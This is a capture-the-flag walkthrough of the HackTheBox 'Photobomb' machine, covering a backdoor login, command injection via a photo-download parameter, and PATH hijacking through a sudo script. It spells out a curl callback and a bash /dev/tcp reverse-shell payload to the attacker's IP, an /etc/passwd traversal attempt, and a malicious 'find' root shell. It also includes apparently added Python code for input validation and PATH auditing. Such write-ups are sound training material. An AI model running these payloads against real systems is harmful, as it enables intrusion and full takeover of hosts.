HackTheBox – Photobomb Write-up

Hi everyone! This write-up covers an easy Linux machine. It involves enumerating the webpage source for a backdoor login URL, exploiting a command injection vulnerability for initial access, and PATH hijacking via sudo for root privileges. Let's get started!

1. Nmap enumeration

$ IP=10.10.11.182
$ sudo nmap -sC -sV -p- $IP
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Based on the nmap result, we can see that the domain name is "photobomb.htb".

2. Web enumeration

Firstly, we should add the domain name into the hosts file.

$ sudo nano /etc/hosts

In /etc/hosts:

127.0.0.1       localhost
127.0.1.1       kali
10.10.11.182    photobomb.htb
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Remember to replace the IP address with the IP address of your target machine. Once changed, we can visit the website via our browser.

If we click on “click here”, we will be prompted with a login pop-up.

2.1 Login backdoor

When looking at the main page’s source code, I went into photobomb.js and noticed there is a backdoor login URL provided that is used by tech support if they forget the login credentials.

Using the login URL, we can log in to the dashboard.

2.1 Command injection via a web request parameter

Firstly, we will need to host a web server using Python.

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Using Burp Suite, when we attempt to download a photo we will intercept a POST request. Inject a command into the filetype parameter that makes a curl request back to our HTTP server, then forward the request. Remember to change the IP to your own machine's IP address. You will also need to URL-encode the payload. We should see our HTTP server receive an incoming connection from the victim.

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg | curl http://10.10.16.18&dimensions=3000x2000

2.2 Reverse shell

We can now get a reverse shell. Firstly, we will need to start a netcat listener.

nc -lvnp 443

Next, we can use Burp Suite again to inject a bash reverse shell that connects back to our netcat listener. Remember to URL-encode it.

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg | /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.18/443 0>&1'&dimensions=3000x2000
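The root cause and the fix, as an added Python illustration that is not part of the original post or the target's code: the download handler's fields pasted into one shell string are injectable, while an allowlist check followed by an argv list with no shell is not. The three field names and the injected body are the page's; the convert command line and its paths are assumptions.

```python
import re
from urllib.parse import parse_qs

# Form bodies: the injected one from the write-up and a clean one (constructed).
INJECTED_BODY = ("photo=voicu-apostol-MWER49YaD-M-unsplash.jpg"
                 "&filetype=jpg | curl http://10.10.16.18&dimensions=3000x2000")
CLEAN_BODY = "photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000"

# Allowlists for the three fields (assumed field shapes; the real server code is not on the page).
PHOTO_RE = re.compile(r"^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*\.jpg$")
FILETYPES = {"jpg", "png"}
DIMENSIONS_RE = re.compile(r"^[1-9]\d{0,4}x[1-9]\d{0,4}$")

def parse_body(body):
    """First value of each field in a form-encoded POST body."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def unsafe_command(form):
    """The injectable pattern: fields pasted into one shell string. Returned, never executed;
    a shell would treat everything after the '|' in filetype as a second command."""
    return ("convert source_images/{photo} -resize {dimensions} "
            "resized_images/out.{filetype}").format(**form)

def validate(form):
    """Reject any field outside its allowlist; return the checked (photo, filetype, dimensions)."""
    photo, ftype, dims = (form.get(k, "") for k in ("photo", "filetype", "dimensions"))
    if not PHOTO_RE.fullmatch(photo) or "/" in photo or ".." in photo:   # no path traversal
        raise ValueError("bad photo")
    if ftype not in FILETYPES:                                            # no shell metacharacters
        raise ValueError("bad filetype")
    if not DIMENSIONS_RE.fullmatch(dims):
        raise ValueError("bad dimensions")
    return photo, ftype, dims

def rejects(form):
    """True when validate() refuses the request."""
    try:
        validate(form)
    except ValueError:
        return True
    return False

def safe_argv(form):
    """argv list for subprocess.run(argv) with no shell: each field is exactly one argument,
    so '|' or ';' inside a value can only be part of a file name, never a new command."""
    photo, ftype, dims = validate(form)
    return ["convert", f"source_images/{photo}", "-resize", dims,
            f"resized_images/{photo.rsplit('.', 1)[0]}_{dims}.{ftype}"]
```

The same photo check is what makes the traversal attempt in section 4.1 fail: any name containing / or .. never reaches the filesystem.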

Our netcat listener should receive a reverse shell. We can then upgrade it to a TTY.

$ nc -lvnp 443 
listening on [any] 443 ...
connect to [10.10.16.18] from (UNKNOWN) [10.10.11.182] 57482
bash: cannot set terminal process group (736): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
wizard@photobomb:~/photobomb$ 

2.3 Get the user flag

wizard@photobomb:~/photobomb$ cd ~
cd ~
wizard@photobomb:~$ ls
ls
photobomb  user.txt
wizard@photobomb:~$ cat user.txt
cat user.txt
b5******************************
wizard@photobomb:~$ 

3. Privilege escalation

3.1 Sudo privilege

wizard@photobomb:~$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

We can see that our current user may run the script as root without a password, and the SETENV tag lets us set environment variables for that run.

3.2 Path hijacking

I first checked if the user has write permission to it. After discovering that it doesn’t, I printed the content of the script and noticed that it is vulnerable to path hijacking.

wizard@photobomb:~$ ls -l /opt/cleanup.sh
ls -l /opt/cleanup.sh
-r-xr-xr-x 1 root root 340 Sep 15 12:11 /opt/cleanup.sh
wizard@photobomb:~$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

I decided to hijack the find command by creating a malicious find file in the current user's home directory that will spawn a shell. Since the file will be executed by root, the shell spawned will have root privileges. After changing the file's permission to allow execution, I used sudo to run the script while setting PATH so that the current user's home directory is searched first for commands. As a result, this spawned a root shell.

wizard@photobomb:~$ echo "/bin/bash -p" > find
echo "/bin/bash -p" > find
wizard@photobomb:~$ chmod 777 find
chmod 777 find
wizard@photobomb:~$ pwd
pwd
/home/wizard
wizard@photobomb:~$ sudo PATH=/home/wizard:$PATH /opt/cleanup.sh
sudo PATH=/home/wizard:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# 
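An added Python example (not from the original post) that audits a script the way a defender would before granting it under sudo with SETENV: it lists the commands cleanup.sh invokes by bare name and emulates the PATH lookup against a constructed set of binaries, showing that a writable directory prepended to PATH replaces find while secure_path alone does not. The script text and secure_path are the page's; the filesystem contents are assumed.

```python
import re

# Copy of /opt/cleanup.sh as printed on the target (constructed test input; comments dropped).
CLEANUP_SH = """#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi
find source_images -type f -name '*.jpg' -exec chown root:root {} \\;
"""
# secure_path from the sudo -l output; SETENV lets the caller prepend a directory they control.
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
HIJACKED_PATH = "/home/wizard:" + SECURE_PATH
# Simulated filesystem (constructed): real binaries plus the file planted in the home directory.
EXECUTABLES = {"/usr/bin/find", "/usr/bin/chown", "/bin/cat", "/usr/bin/truncate", "/home/wizard/find"}

LEADING = {"if", "then", "else", "do", "!", "while", "until"}   # keywords, never PATH lookups
BUILTINS = {"[", "cd", ".", "source", "export", "fi", "done", "exit", "echo"}
SEGMENTS = re.compile(r"\|\||&&|\||;")

def bare_commands(script):
    """Yield command names run by bare name, so PATH decides which binary actually executes."""
    for line in script.splitlines():
        for seg in SEGMENTS.split(line.split("#", 1)[0]):
            words = seg.split()
            while words and words[0] in LEADING:
                words.pop(0)
            if words and "/" not in words[0] and words[0] not in BUILTINS:
                yield words[0]
            if "-exec" in words[:-1]:            # find -exec runs its argument by name too
                nxt = words[words.index("-exec") + 1]
                if "/" not in nxt:
                    yield nxt

def resolve(cmd, path, executables):
    """Emulate PATH lookup: the first directory on PATH holding an executable named cmd."""
    return next((f"{d}/{cmd}" for d in path.split(":") if f"{d}/{cmd}" in executables), None)

def audit(script, path, executables, trusted_dirs):
    """Return {command: binary} for bare commands that would resolve outside trusted_dirs."""
    findings = {}
    for cmd in bare_commands(script):
        target = resolve(cmd, path, executables)
        if target and target.rsplit("/", 1)[0] not in trusted_dirs:
            findings[cmd] = target
    return findings
```

The fix the audit points at is to pin PATH inside the script (or call /usr/bin/find and /usr/bin/chown by absolute path) and to drop SETENV from the sudoers entry.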

3.3 Getting root flag

root@photobomb:/home/wizard/photobomb# cd ~  
cd ~
root@photobomb:~# ls
ls
root.txt
root@photobomb:~# cat root.txt
cat root.txt
ae******************************

4. Additional stuff

This section contains findings that do not help us get the flags, but that show which methods are dead ends.

4.1 Local File Inclusion (LFI) not possible

Similarly, using Burp Suite, I tried to fuzz the photo parameter by encoding an LFI path to the passwd file with a NULL byte (cheatsheet from HackTricks).

photo=%252e%252e%252fetc%252fpasswd%00&filetype=jpg&dimensions=3000x2000

It should dump out an error. Expanding the first row, we will be able to see the partial source code that checks our filename. Note that there is a check for the forward slash (/) and for double dots (..), which prevents path traversal. As a result, there is no way for us to bypass it, which means LFI is a rabbit hole.

I hope these tabs have been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
